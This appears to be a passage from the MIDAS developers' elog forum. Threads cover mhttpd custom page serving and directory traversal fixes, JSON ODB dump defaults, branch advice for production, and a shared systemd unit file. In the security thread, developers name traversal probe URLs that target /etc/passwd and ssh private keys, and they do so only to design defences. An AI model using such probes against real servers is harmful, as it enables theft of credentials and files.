> So for all practical purposes, somebody with access to the mhttpd web pages also has shell access
> to the user account running mhttpd.

Agree. And this is on the same level as accessing /etc/passwd. So either we allow all of them or none of them. Something in between absolutely does not make sense to me.

To shorten the discussion: I think what we do right now does not make sense, but I do not insist of changing it. If people want it like that, fine with me. Just a waste of your time fixing the "/" path.

Stefan
                            Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> Just set 
> /Custom/Path = /./ 
> which is allowed right now and then access etc/passwd, which translates to /./etc/passwd and then you get the password file.

Nope. http://localhost:8080/etc/passwd yields this error regardless of the value of /Custom/Path: MIDAS error: Invalid custom file name 'etc/passwd' contains '/' or '/'

> We should make up our mind:
> 1) We trust each user who has access to mhttpd. The accessing /etc/passwd is not a problem and I don't understand all the fuzz we had recently. Why all the recent work?

Stefan, "/etc/passwd" is a stand-in for "$HOME/.ssh/id_rsa". Surely stealing the ssh keys is a very bad thing.

> 2) We do not trust users connected via mhttpd, but we trust users who can log in to the online machine.
> If we do not trust users having access to mhttpd, then it does not make sense in my mind to fix one hole and keep a few other open.
> You correctly mentioned the /Programs/xxx/Start command, and there are a few others, like executing scripts directly. Either we fix all (known) holes or we don't bother.

I see a distinction between accessing a magic URL (a read-only operation) and a targeted attack (editing odb, etc).

In the first case, it's a script-kiddie "let's try http:blah/etc/passwd, http:blah/../etc/passwd, etc, bingo!).

In the second case, if it's a targeted attack, forget about it. If an attacker wants in, they will get it. Have secure backups, etc.

Plus eventually we will restore the user access controls - read-only access, operator access (can start runs, edit history plots) and Q access. Only
this very last one would allow editing of ODB.

> 3) We do not trust users who can log in to the online machine, since they can just cat /etc/passwd. But then why give them access to the online machine?

ssh foo cat /etc/passwd is normal
http://foo/etc/passwd is not normal

> So which of the three options would you prefer?

I try to think simple:
if something worked yesterday and works today, let it be
if we add something new, it should not be obviously insecure

> 
> Thanks to the nice public discussion here on the forum (and I still think this is the correct way to discuss these things), all forum subscribers are now aware of several security holes.
> So either they are evil, then we have to fix all (known) holes. Or we trust  them, then we don't care.
> 

Here is the elephant in the room. mhttpd has never gone through a security audit. It's easy to find
security holes (buffer overflows) can be easily found by "grep sprintf".

To me, this means that access to mhttpd always must be password-protected.

Password protection requires https.

The built-in mongoose https server is as safe as the mongoose library (probably yes) and the openssl library (yes-ish, see openbsd libressl)

The external apache https takes a few minutes to setup, as the "industry standard", it is trusted to be safe.

>
> > Stefan, we already allow execution of arbitrary commands via ODB "/Programs/xxx/Start Command".
> This is on the same level as accessing /etc/passwd. So either we allow all of them or none of them. Something in between absolutely does not make sense to me.
>

Ok, we have identified our difference of opinion:

I think serving arbitrary files over http is a bad idea (on general principles)
and you think it is okey because there are other ways to get to those files.

Fair enough.

K.O.

P.S. Hmm... not fair enough.

I am now thinking about web-browser security -
suppose some kind of cross-site or cross-tab exploit comes out and suddenly
arbitrary web pages loaded from facebook.com (or worse) gain access
to the mhttpd web pages if both are open at the same time.

We may be still protected by obscurity and they presumably do not know how to change
things in odb, but I think it is a good idea to protect ourselves at least
against drive-by attacks (try http:blah/etc/passwd, try http:blah/../etc/passwd, etc,
replace /etc/passwd by some other secret file, try again - think  ssh keys, etc).

K.O.
       Reply  14 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
I now understand Stefan's and Thomas's proposal a little bit better.

In my mind only one issue remains - when we say "we will serve files from directory X", how
to we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
and/or other gimmicks.

The code I currently put in mhttpd, disallows multi-level URL path names (by rejecting names that contain the directory separator "/").

This has the effect of keeping the mhttpd URL space flat (without subdirectories).

http://localhost:8080/Status.html  <--- no multi level URLs like we used to have:
http://localhost:8080/CS/Custom.html <--- no more of these

Keeping the URL space restricted to one level is important if we do not want to defeat
the recent change to the mhttpd URL scheme - if mhttpd runs behind a proxy, without
a "Base URL" (which we just removed), we can only use relative URLs to navigate
between midas pages and if we permit multi-level URLs, it becomes hard to get
back to the status page without the ugly counting of ".." URL elements (which ugly and
brittle code we also just recently removed) (n.b. to navigate from CS/Custom.html
to the status page, one must redirect to "../Status.html").

But this whole beautiful cathedral falls apart from one valid use case: we want to serve "jsroot"
from a subdirectory called "jsroot" - this is how this package is packaged and we do not want
to mess with it just to make midas happy.

So at the least we must enable serving of multi-level URL path names to serve 3rd party packages.

The most trivial way out is to replace the URL check "/ is not permitted" with ".. is not permitted".

(One could also have a list of all permitted subdirectories in ODB, but this would be hard to use and 
difficult to implement. Not my favourite solution.)

This will break the flatness of the mhttpd URLs (no subdirectories). But maybe it is sufficient
to write down "do not do this!" and close with "wontfix" all bug reports about "my custom page
is at http://localhost:8080/mycustomdir/new/verynew/custom.html, how come the [status] button
does not take me back to the status page?".


K.O.

> Parsing all URL in mhttpd to prevent /etc/passwd etc. to be returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> on the file system level when opening a file. The only escape there one could have is "..", which can be tested easily. 
> 
> Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> 
> $MIDASSYS/resource -> /usr/local/midas/resources
> <exptab>/resources -> /home/users/exp/resources
> 
> These directories should be hard-wired into mhttpd, and not go through and ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> back-door. 
> 
> If users need a more complex structure, they can put soft links into these directories.
> 
> The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> 
> This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> bullet.
> 
> Comments are welcome.
> 
> Stefan
          Reply  14 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> In my mind only one issue remains - when we say "we will serve files from directory X", how
> to we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
> and/or other gimmicks.
> 
> Disallow multi-level URL path names (by rejecting names that contain the directory separator "/").
> Replace the URL check "/ is not permitted" with ".. is not permitted".
> 

https://en.wikipedia.org/wiki/Directory_traversal_attack

K.O.
             Reply  14 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > In my mind only one issue remains - when we say "we will serve files from directory X", how
> > to we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
> > and/or other gimmicks.
> > 
> > Disallow multi-level URL path names (by rejecting names that contain the directory separator "/").
> > Replace the URL check "/ is not permitted" with ".. is not permitted".
>
> https://en.wikipedia.org/wiki/Directory_traversal_attack

and, from Mitre's "Common Weakness Enumeration", with examples:

http://cwe.mitre.org/data/definitions/22.html

K.O.
          Reply  21 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> In my mind only one issue remains - when we say "we will serve files from directory X", how
> to we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
> and/or other gimmicks.
> 
> So at the least we must enable serving of multi-level URL path names to serve 3rd party packages.
> 
> The most trivial way out is to replace the URL check "/ is not permitted" with ".. is not permitted".
> 

This change is "in". commit https://bitbucket.org/tmidas/midas/commits/b231d10b5816c14428a69ee97b16f6fee7819367

mhttpd should be able to serve "jsroot" and other 3rd packages now.

K.O.
    Reply  21 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> Before the days of javascript and ajax and web 2.0, MIDAS introduced "custom pages" for
> building graphical display that could show "live" data from MIDAS and that could
> have buttons and controls to operate slow controls equipment, etc.

As summary of latest gyrations, this is how mhttpd can be used to serve custom pages:

a) old custom pages path:

?cmd=custom&page=XXX serves filename contained in ODB /Custom/XXX if it exists. Value of ODB /Custom/Path is prepended to the filename unless it already starts with a "/"

b) alternate custom pages path:

if ODB /Custom/URL or /Custom/URL& or /Custom/URL! exist, serves filename contained in corresponding ODB entry. Again value of ODB /Custom/Path is prepended to the filename 
unless it already starts with a "/".

In both cases, ".." is not permitted in the custom page name to avoid ODB path traversal attack (escape from /Custom subdirectory by using custom page names like "../System/blah").

c) new custom page path:

if ODB /Custom/Path exists and is not empty, it is prepended to the URL and this forms the filename (ODB[/Custom/Path] + "/" + URL). If this file exists, it is served. To prevent directory 
traversal attacks, ".." is not permitted in the URL.

d) resource search path:

file given by the URL is searched in the resource search path (see "resource paths" on the mhttpd help page, typically $MIDASSYS/resources, etc), e.g.
http://localhost:8080/status.html -> serves $MIDASSYS/resources/status.html.

this is the normal way to serve all standard midas web pages.

to (a) prevent directory traversal attack and (b) enforce flat namespace (no URL subdirectories), send_resource() disallows "/" (and "\" on Windows) anywhere in the filename.

Notes:

1) path traversal attacks are detailed here, MIDAS is subject to both filesystem and ODB path traversal attacks.
http://cwe.mitre.org/data/definitions/22.html

2) methods (c) and (d) are duplicative. In the next rework of mhttpd (update of mongoose library, update of multithreading,
update of web server configuration in ODB, etc), we will probably change serving of custom files along the lines
proposed by Stefan and Thomas.

3) the "old custom pages" code will most likely remain as is: it works with the new url scheme, it does not suffer from path traversal attacks and it is still used by some experiments.

K.O.
Entry  14 Mar 2019, Konstantin Olchanski, Info, switch to json odb dump format 
Regarding odb dumps saved into the midas output files, there are several
requests to make it possible to save odb in the json format.

Since 2019-02-12 commits
https://bitbucket.org/tmidas/midas/commits/ccaeeef4d6a1f0d91a67f2dc0a68105b7f6b77ae
and
https://bitbucket.org/tmidas/midas/commits/b3251587a68ef577919c81a221559e9af4dc8ae6

The format of the odb dump is specified by ODB
/Logger/Channels/0/Settings/ODB dump format (default is "json", was hardcoded as "xml").

The filename of the odb dump file saved at the end of run is specified by ODB
/Logger/ODB Last Dump File (default is "last.json", was hardcoded as "last.xml").

In addition, the following defaults have been changed, enabling LZ4 compession and CRC32C checksums by default:

/Logger/ODB dump file (new default is "run%05d.json", was "run%05d.odb")
/Logger/Channels/0/Settings/
Output "FILE"
Compress "lz4"
Checksum "CRC32C".

This brings mlogger default settings closer to what one would expect in the 21st century - "free" compression (LZ4)
and output file data integrity protected by checksums (CRC32C). These defaults are "free" in the sense that turning
them off would not noticeably improve the system performance. (Some users may want to enable better compression,
such as BZIP2 or PBZIP2 and better checksums, such as SHA256 or SHA512 - both choices that have significant CPU-use cost).

The default ODB dump format is now consistently "json" (vs the previous mix of XML and ODB formats).

Why "json" as the default? There has to be some default. The old ODB dump format is right out. Compared to XML,
JSON dump file size is smaller and the encoder is faster (important for reducing the time to start a run - where ODB dump is done twice). Tools for parsing 
JSON data are more widely available and "JSON has won in the marketplace". See also https://www.w3schools.com/js/js_json_xml.asp

Those who want to continue to use XML ODB dumps can trivially continue to do so by changing the settings listed above.

In the rootana package, we have the XmlOdb class for parsing XML ODB dumps, but no matching JsonOdb class for parsing
JSON ODB data. This reminds me of difficulties working with XML data. I originally wrote the XmlOdb class using
the "libxml2" package. After discovering that many Linux distributions do not install this package by default, I switched
to the DOM and XML parsers from ROOT (since rootana is not very useful without ROOT anyway). Only to discover that
some binary ROOT distributions distributed by CERN exclude the XML parser from their default build.

I do intend to write the JsonOdb class for rootana, and I will probably do it using the mjson.{h,cxx} parser that I wrote
for MIDAS. (lack of the JsonOdb class is the reason I did not switch MIDAS ODB dumps to JSON much earlier
than now. the camel back was broken by the extra slow run start time in the ALPHA-g DAQ system).

K.O.
Entry  18 Jan 2019, Konstantin Olchanski, Info, bitbucket issue tracker "feature" 
It turns out the bitbucket issue tracker has a feature - I cannot make it automatically add me 
to the watcher list of all new issues.

So when you create a new issue, I think I get one message about it, and no more.

If there is some other activity on the issue (Stefan answers, Thomas answers),
I most definitely will not see any of it.

So in case you wondered why I sometimes completely do not react to some bug reports, this 
is why.

So much for "advanced" and "highly automated" and "intelligent" bug tracking.

K.O.
    Reply  14 Mar 2019, Konstantin Olchanski, Info, bitbucket issue tracker "feature" 
> It turns out the bitbucket issue tracker has a feature - I cannot make it automatically add me 
> to the watcher list of all new issues.
> 
> So when you create a new issue, I think I get one message about it, and no more.
> 

I retested this and I confirm that for new issues I am not a watcher "by default". If I reply to an issue,
the system enters an inconsistent state - it thinks I am a watcher, the best I can tell, but it also
says "0 watchers".

K.O.
Entry  02 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
Hello!
My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
University (Japan). I also happen to be a T2K collaborator.
I am currently developing the DAQ software for a T2K near detector called WAGASCI 
(different from ND280) and we recently decided to adopt MIDAS as a user 
interface.
Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
the remote repository every now and then with my local copy and that is fine ... 
but on the 25th of April our experiment is officially starting and I was 
wondering which version of MIDAS should I use for "production".
So my question is:
For a running experiment that needs software stability what branch of the MIDAS 
repository is better suited? The master branch or the develop branch? Moreover, 
what point in time do you think is more stable?
Best regards
Giorgio
    Reply  04 Mar 2019, Konstantin Olchanski, Forum, Best MIDAS branch/version for "production" 
Hi, Giorgio - you are asking excellent questions. I will try to answer them, but as ever, there are no 
easy answers.

In general, the top of the midas "develop" branch is "the best midas there is".

So for a new experiment, it is a reasonable place to start. Of course you can see
that there is quite a bit of commit activity going on, however, most substantial
changes are done on separate branches, where we try the new code, debug
it and test it. Only when the new code is "ready", we commit it to the "develop"
branch. Then, most often, we find some more last minute post-merge bugs,
and fix them right then and there on the head of the "develop" branch. Eventually
the dust settles and we have stable code that stays stable for a long time.

For example, right now we are waiting for the dust to settle on the change
of the MIDAS URL scheme, which was necessitated by needs of several experiments
that have more-complex-then-usual https proxy configurations. Unusual today,
but more common as we move forward, I think.

So if the head of the "develop" branch does not work for you, we encourage
that you file a bug report (here on this forum or on the bitbucket issue tracker).

While we try to sort out your problem, you can fall back to a previous version
of midas:

a) go back to one of the older "midas-YYYY-MM-X" tags
b) go back to one of the release candidate branches "feature/midas-YYYY-MM".

But if you have an already running system and you already have a working
instance of MIDAS, you do not have to update it to the latest version
unless you need some newest feature or you suffer from a bug
that has been fixed in a newer version.

In general, I find that it is fairly safe to update a working instance of MIDAS to
the latest code. But do keep your old working copy, if there is trouble, you can
always go back to something that works.

Now to your questions:

> For a running experiment that needs software stability what branch of the MIDAS 
> repository is better suited?

easy to answer. the most stable is the version you are using right now (doh!). each time
you upgrade, there is a risk that something will go wrong.

if you start from scratch, use the head of the "develop" branch (the latest and greatest),
if you run into trouble, report the trouble and update to a newer version with your
trouble fixed, or go back in time to previous tags and release candidate branches (as I described 
above).

> The master branch or the develop branch?

the "develop" branch.

> Moreover, what point in time do you think is more stable?

I find that it is impossible to have a stable-stable-stable version of midas
because the rest of the world flows forward in time. Old versions of midas
stop compiling because of OS and compiler changes; they stop running
because of OS or web browser or hardware changes. Then somebody
always asks for new features and new or old bugs surface constantly.

But we try to mark some "good" spots using git tags and release branches,
however the more far you go back in time, the more likely the code will
not even compile anymore.


K.O.



> Hello!
> My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
> University (Japan). I also happen to be a T2K collaborator.
> I am currently developing the DAQ software for a T2K near detector called WAGASCI 
> (different from ND280) and we recently decided to adopt MIDAS as a user 
> interface.
> Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
> the remote repository every now and then with my local copy and that is fine ... 
> but on the 25th of April our experiment is officially starting and I was 
> wondering which version of MIDAS should I use for "production".
> So my question is:
> For a running experiment that needs software stability what branch of the MIDAS 
> repository is better suited? The master branch or the develop branch? Moreover, 
> what point in time do you think is more stable?
> Best regards
> Giorgio
       Reply  04 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
Hi Konstantin,
thank you for the very in-depth answer. Right now I am using the latest version of MIDAS (the head of the 
develop branch) and I have not noticed any bugs or problems in the MIDAS code, except the ones that I 
myself put in the part of the code that I am developing of course.
So I will do as you suggest and continue to use the head of the develop branch.
Thank you again for taking the time to answer all my questions!

PS other than the code peculiar to our experiment, I have made a little modification to the MIDAS install 
Makefile (I noticed that there is an "install" target but not an "uninstall" target so I wrote it).
If you are interested, I could make a merge request on BitBucket, just let me know.

Bests
Giorgio

> Hi, Giorgio - you are asking excellent questions. I will try to answer them, but as ever, there are no 
> easy answers.
> 
> In general, the top of the midas "develop" branch is "the best midas there is".
> 
> So for a new experiment, it is a reasonable place to start. Of course you can see
> that there is quite a bit of commit activity going on, however, most substantial
> changes are done on separate branches, where we try the new code, debug
> it and test it. Only when the new code is "ready", we commit it to the "develop"
> branch. Then, most often, we find some more last minute post-merge bugs,
> and fix them right then and there on the head of the "develop" branch. Eventually
> the dust settles and we have stable code that stays stable for a long time.
> 
> For example, right now we are waiting for the dust to settle on the change
> of the MIDAS URL scheme, which was necessitated by needs of several experiments
> that have more-complex-then-usual https proxy configurations. Unusual today,
> but more common as we move forward, I think.
> 
> So if the head of the "develop" branch does not work for you, we encourage
> that you file a bug report (here on this forum or on the bitbucket issue tracker).
> 
> While we try to sort out your problem, you can fall back to a previous version
> of midas:
> 
> a) go back to one of the older "midas-YYYY-MM-X" tags
> b) go back to one of the release candidate branches "feature/midas-YYYY-MM".
> 
> But if you have an already running system and you already have a working
> instance of MIDAS, you do not have to update it to the latest version
> unless you need some newest feature or you suffer from a bug
> that has been fixed in a newer version.
> 
> In general, I find that it is fairly safe to update a working instance of MIDAS to
> the latest code. But do keep your old working copy, if there is trouble, you can
> always go back to something that works.
> 
> Now to your questions:
> 
> > For a running experiment that needs software stability what branch of the MIDAS 
> > repository is better suited?
> 
> easy to answer. the most stable is the version you are using right now (doh!). each time
> you upgrade, there is a risk that something will go wrong.
> 
> if you start from scratch, use the head of the "develop" branch (the latest and greatest),
> if you run into trouble, report the trouble and update to a newer version with your
> trouble fixed, or go back in time to previous tags and release candidate branches (as I described 
> above).
> 
> > The master branch or the develop branch?
> 
> the "develop" branch.
> 
> > Moreover, what point in time do you think is more stable?
> 
> I find that it is impossible to have a stable-stable-stable version of midas
> because the rest of the world flows forward in time. Old versions of midas
> stop compiling because of OS and compiler changes; they stop running
> because of OS or web browser or hardware changes. Then somebody
> always asks for new features and new or old bugs surface constantly.
> 
> But we try to mark some "good" spots using git tags and release branches,
> however the more far you go back in time, the more likely the code will
> not even compile anymore.
> 
> 
> K.O.
> 
> 
> 
> > Hello!
> > My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
> > University (Japan). I also happen to be a T2K collaborator.
> > I am currently developing the DAQ software for a T2K near detector called WAGASCI 
> > (different from ND280) and we recently decided to adopt MIDAS as a user 
> > interface.
> > Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
> > the remote repository every now and then with my local copy and that is fine ... 
> > but on the 25th of April our experiment is officially starting and I was 
> > wondering which version of MIDAS should I use for "production".
> > So my question is:
> > For a running experiment that needs software stability what branch of the MIDAS 
> > repository is better suited? The master branch or the develop branch? Moreover, 
> > what point in time do you think is more stable?
> > Best regards
> > Giorgio
          Reply  05 Mar 2019, Konstantin Olchanski, Forum, Best MIDAS branch/version for "production" 
> 
> PS other than the code peculiar to our experiment, I have made a little modification to the MIDAS install 
> Makefile (I noticed that there is an "install" target but not an "uninstall" target so I wrote it).
> If you are interested, I could make a merge request on BitBucket, just let me know.
> 

Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.

K.O.



> Bests
> Giorgio
> 
> > Hi, Giorgio - you are asking excellent questions. I will try to answer them, but as ever, there are no 
> > easy answers.
> > 
> > In general, the top of the midas "develop" branch is "the best midas there is".
> > 
> > So for a new experiment, it is a reasonable place to start. Of course you can see
> > that there is quite a bit of commit activity going on, however, most substantial
> > changes are done on separate branches, where we try the new code, debug
> > it and test it. Only when the new code is "ready", we commit it to the "develop"
> > branch. Then, most often, we find some more last minute post-merge bugs,
> > and fix them right then and there on the head of the "develop" branch. Eventually
> > the dust settles and we have stable code that stays stable for a long time.
> > 
> > For example, right now we are waiting for the dust to settle on the change
> > of the MIDAS URL scheme, which was necessitated by needs of several experiments
> > that have more-complex-then-usual https proxy configurations. Unusual today,
> > but more common as we move forward, I think.
> > 
> > So if the head of the "develop" branch does not work for you, we encourage
> > that you file a bug report (here on this forum or on the bitbucket issue tracker).
> > 
> > While we try to sort out your problem, you can fall back to a previous version
> > of midas:
> > 
> > a) go back to one of the older "midas-YYYY-MM-X" tags
> > b) go back to one of the release candidate branches "feature/midas-YYYY-MM".
> > 
> > But if you have an already running system and you already have a working
> > instance of MIDAS, you do not have to update it to the latest version
> > unless you need some newest feature or you suffer from a bug
> > that has been fixed in a newer version.
> > 
> > In general, I find that it is fairly safe to update a working instance of MIDAS to
> > the latest code. But do keep your old working copy, if there is trouble, you can
> > always go back to something that works.
> > 
> > Now to your questions:
> > 
> > > For a running experiment that needs software stability what branch of the MIDAS 
> > > repository is better suited?
> > 
> > easy to answer. the most stable is the version you are using right now (doh!). each time
> > you upgrade, there is a risk that something will go wrong.
> > 
> > if you start from scratch, use the head of the "develop" branch (the latest and greatest),
> > if you run into trouble, report the trouble and update to a newer version with your
> > trouble fixed, or go back in time to previous tags and release candidate branches (as I described 
> > above).
> > 
> > > The master branch or the develop branch?
> > 
> > the "develop" branch.
> > 
> > > Moreover, what point in time do you think is more stable?
> > 
> > I find that it is impossible to have a stable-stable-stable version of midas
> > because the rest of the world flows forward in time. Old versions of midas
> > stop compiling because of OS and compiler changes; they stop running
> > because of OS or web browser or hardware changes. Then somebody
> > always asks for new features and new or old bugs surface constantly.
> > 
> > But we try to mark some "good" spots using git tags and release branches,
> > however the more far you go back in time, the more likely the code will
> > not even compile anymore.
> > 
> > 
> > K.O.
> > 
> > 
> > 
> > > Hello!
> > > My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
> > > University (Japan). I also happen to be a T2K collaborator.
> > > I am currently developing the DAQ software for a T2K near detector called WAGASCI 
> > > (different from ND280) and we recently decided to adopt MIDAS as a user 
> > > interface.
> > > Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
> > > the remote repository every now and then with my local copy and that is fine ... 
> > > but on the 25th of April our experiment is officially starting and I was 
> > > wondering which version of MIDAS should I use for "production".
> > > So my question is:
> > > For a running experiment that needs software stability what branch of the MIDAS 
> > > repository is better suited? The master branch or the develop branch? Moreover, 
> > > what point in time do you think is more stable?
> > > Best regards
> > > Giorgio
             Reply  05 Mar 2019, Stefan Ritt, Forum, Best MIDAS branch/version for "production" 
> Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.


... and change the documentation accordingly (Suzannah!?). Installing midas these days does not really make sense, since normally only one 
users uses it on a given machine.

Stefan
                Reply  06 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
> > Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.
> 
> 
> ... and change the documentation accordingly (Suzannah!?). Installing midas these days does not really make sense, since normally only one 
> users uses it on a given machine.
> 
> Stefan

I understand. Anyway, I preferred to install MIDAS in the /opt/midas folder to remain consistent with the other programs that we are using for 
our experiment (Pyrame and Calicoes from LLR). I am also using Linux systemd to enable mhttpd on startup (and other handy features like auto-
restart after a crash) and unfortunally CentOS doesn't support to enable systemd units as a non-root user.
So in my particular case, perhaps it made some sense to install MIDAS in a folder other than the source code folder
Giorgio
                   Reply  06 Mar 2019, Konstantin Olchanski, Forum, Best MIDAS branch/version for "production" 
> > > Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.
>
> install MIDAS in the /opt/midas folder to remain consistent with the other programs that we are using for 
> our experiment (Pyrame and Calicoes from LLR).

I see. Would this work as well? Instead of "make install" do this:
su - root
cd /opt
git pull midas
cd midas
make
add /opt/midas/linux/bin to your PATH. (is it time to get rid of the "linux" part from the default build path?!?)

> I am also using Linux systemd to enable mhttpd on startup

We use cron @reboot to start mhttpd.

But. CentOS7 systemd cron unit file has a bug and they run @reboot cron jobs before NIS and autofs is ready, see
http://www.triumf.info/wiki/DAQwiki/index.php/SLinstall#Enable_crontab_.40reboot_for_MIDAS_.28CentOS7.29

Can you post your systemd unit file to this elog, others may find it useful.

K.O.
                      Reply  06 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
> I see. Would this work as well? Instead of "make install" do this:
> su - root
> cd /opt
> git pull midas
> cd midas
> make
> add /opt/midas/linux/bin to your PATH. (is it time to get rid of the "linux" part from the default build path?!?)

Got it. I will do that in the future.

> Can you post your systemd unit file to this elog, others may find it useful.

[Unit]
Description=MIDAS data acquisition system
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=3
User=neo
ExecStart=/opt/midas/bin/mhttpd -e WAGASCI --http 8081 --https 8444
Environment="MIDASSYS=/opt/midas" "MIDAS_EXPTAB=/home/neo/Code/WAGASCI/MIDAS/online/exptab" "MIDAS_EXPT_NAME=WAGASCI" 
"SVN_EDITOR=emacs -nw" "GIT_EDITOR=emacs -nw"
PassEnvironment=MIDASSYS MIDAS_EXPTAB MIDAS_EXPT_NAME SVN_EDITOR GIT_EDITOR

[Install]
WantedBy=multi-user.target
                         Reply  13 Mar 2019, Konstantin Olchanski, Forum, systemd unit file for mhttpd 
> > Can you post your systemd unit file to this elog, others may find it useful.

Thank you very much!

Note: user name "neo" and home directory is hardwired into the unit file. Also
it runs after "network.target", this may be too early, it should run after nis and autofs
have started (and made home directories accessible). (not sure what systemd target
that is).

K.O.

> 
> [Unit]
> Description=MIDAS data acquisition system
> After=network.target
> StartLimitIntervalSec=0
> 
> [Service]
> Type=simple
> Restart=always
> RestartSec=3
> User=neo
> ExecStart=/opt/midas/bin/mhttpd -e WAGASCI --http 8081 --https 8444
> Environment="MIDASSYS=/opt/midas" "MIDAS_EXPTAB=/home/neo/Code/WAGASCI/MIDAS/online/exptab" 
"MIDAS_EXPT_NAME=WAGASCI" 
> "SVN_EDITOR=emacs -nw" "GIT_EDITOR=emacs -nw"
> PassEnvironment=MIDASSYS MIDAS_EXPTAB MIDAS_EXPT_NAME SVN_EDITOR GIT_EDITOR
> 
> [Install]
> WantedBy=multi-user.target
                            Reply  13 Mar 2019, Pintaudi Giorgio, Forum, systemd unit file for mhttpd 
> Note: user name "neo" and home directory is hardwired into the unit file. Also
> it runs after "network.target", this may be too early, it should run after nis and autofs
> have started (and made home directories accessible). (not sure what systemd target
> that is).

Thank you very much for the comments!

My home directory is hardwired because it is not straightforward to add environment variables into 
systemd units. Actually, I install MIDAS through a bash shell script that automatically generates 
the unit file during installation. So, for another user who would use my script, the correct path 
in the unit file would be generated at installation time. Another option would be to create an 
environment file and then feed it to the unit file (EnvironmentFile directive) as explained here: 
https://coreos.com/os/docs/latest/using-environment-variables-in-systemd-units.html

For the autofs, thank you for the hint. I have modified the unit file accordingly.

As far as NIS is concerned, I am sorry but I don't know how it is used by MIDAS. Actually, I don't 
even have it installed on my machine. Anyway, I have modified the unit file accordingly (but I 
haven't tested with NIS installed).

The modified unit file is this:

[Unit]
Description=MIDAS data acquisition system
After=network.target rpcbind.target ypbind.target
StartLimitIntervalSec=0
RequiresMountsFor=%h

[Service]
Type=simple
Restart=always
RestartSec=3
User=neo
ExecStart=/opt/midas/bin/mhttpd -e <nameofyourexperiment> --http <yourhttpport> --https 
<yourhttpsport>
Environment="MIDASSYS=/opt/midas" "MIDAS_EXPTAB=<path/to/your/exptab>" "MIDAS_EXPT_NAME=
<nameofyourexperiment>" "SVN_EDITOR=emacs -nw" "GIT_EDITOR=emacs -nw"
PassEnvironment=MIDASSYS MIDAS_EXPTAB MIDAS_EXPT_NAME SVN_EDITOR GIT_EDITOR

[Install]
WantedBy=multi-user.target
                               Reply  14 Mar 2019, Konstantin Olchanski, Forum, systemd unit file for mhttpd 
> As far as NIS is concerned, I am sorry but I don't know how it is used by MIDAS.

NIS is traditionally used together with autofs to form clusters of UNIX/Linux machines. NIS is a database
of user names, passwords, home directories, NFS (autofs) mount points and NFS exports. autofs would
read all it's configuration from the NIS database.

So the correct boot sequence in most cases would be like this:
hardware init -> network init -> nis -> autofs -> users can login -> start midas (mhttpd) from cron @reboot or similar.

(In organizations that have a dedicated staff of IT sysadmins, you would see LDAP instead of NIS).

K.O.
Entry  11 Mar 2019, Francesco Renga, Forum, Run length 
Dear all,
        I need to implement a DAQ sequence where a short run (100 events, which takes a couple of 
minutes) is taken every hour, with a long run in between two short runs. In the sequencer, I can do:

LOOP infinite

.... some ODB settings ....
     TRANSITION START
     WAIT events 100
     TRANSITION STOP

.... some ODB settings ....
     TRANSITION START
     WAIT seconds 3600
     TRANSITION STOP

ENDLOOP


I have two questions: 

- for the long run, I want to write on disk only a maximum number of events. I think I can suppress 
the event polling in the frontend, with an ODB query of the number of collected events. I'm 
wondering if there is a smarter way to do that. It is also ok if the run is stopped after a maximum 
number of events, but the subsequent short run should still start exactly after 1h from the previous 
short run. 

- with the script above, the real time lapse between the start of two short runs would depend on 
the duration of the short run itself. Is there a way to start the short run exactly 1 h after the starting 
of the previous short run?

Thank you in advance for your help,
              Francesco
    Reply  12 Mar 2019, Stefan Ritt, Forum, Run length 
> Is there a way to start the short run exactly 1 h after the starting 
> of the previous short run?

This is not possible with the current sequencer.
    Reply  12 Mar 2019, Pierre Gorel, Forum, Run length 
> 
> .... some ODB settings ....
>      TRANSITION START
>      WAIT events 100
>      TRANSITION STOP
> I have two questions: 
> 
> - for the long run, I want to write on disk only a maximum number of events. I think I can suppress 
> the event polling in the frontend, with an ODB query of the number of collected events. I'm 
> wondering if there is a smarter way to do that. It is also ok if the run is stopped after a maximum 
> number of events, but the subsequent short run should still start exactly after 1h from the previous 
> short run. 

I don't know about a way to give you an exact number of events (maybe /Logger/Run duration). 

I personally use 
